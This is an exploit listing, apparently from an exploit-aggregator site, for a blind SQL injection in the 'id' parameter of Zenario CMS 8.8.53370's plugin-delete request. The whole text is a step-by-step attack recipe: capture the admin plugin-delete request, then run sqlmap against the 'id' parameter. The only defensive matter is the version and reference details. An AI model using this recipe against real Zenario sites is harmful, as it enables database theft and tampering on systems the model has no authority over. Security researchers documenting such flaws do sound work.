Exploit for Zenario CMS 8.8.53370 SQL Injection

Name: Exploit for Zenario CMS 8.8.53370 SQL Injection
Rating: 5 (156 reviews)

2021-03-15 | CVSS 0.3

## https://sploitus.com/exploit?id=PACKETSTORM:161770
# Exploit Title: Zenario CMS 8.8.53370 - 'id' Blind SQL Injection   
# Date: 05/02/2021  
# Exploit Author: Balaji Ayyasamy  
# Vendor Homepage: https://zenar.io/  
# Software Link: https://github.com/TribalSystems/Zenario/releases/tag/8.8  
# Version: 8.8.53370  
# Tested on: Windows 10 Pro 19041 (x64_86) + XAMPP 7.4.14  
  
# Reference - https://edhunter484.medium.com/blind-sql-injection-on-zenario-cms-b58b6820c32d  
  
Step 1 - Login to the zenario cms with admin credentials.  
Step 2 - Go to modules and select plugin library.  
Step 3 - Select any plugin and press delete button. Copy the delete request and send it to the sqlmap.  
  
Command - sqlmap -r request.txt -p id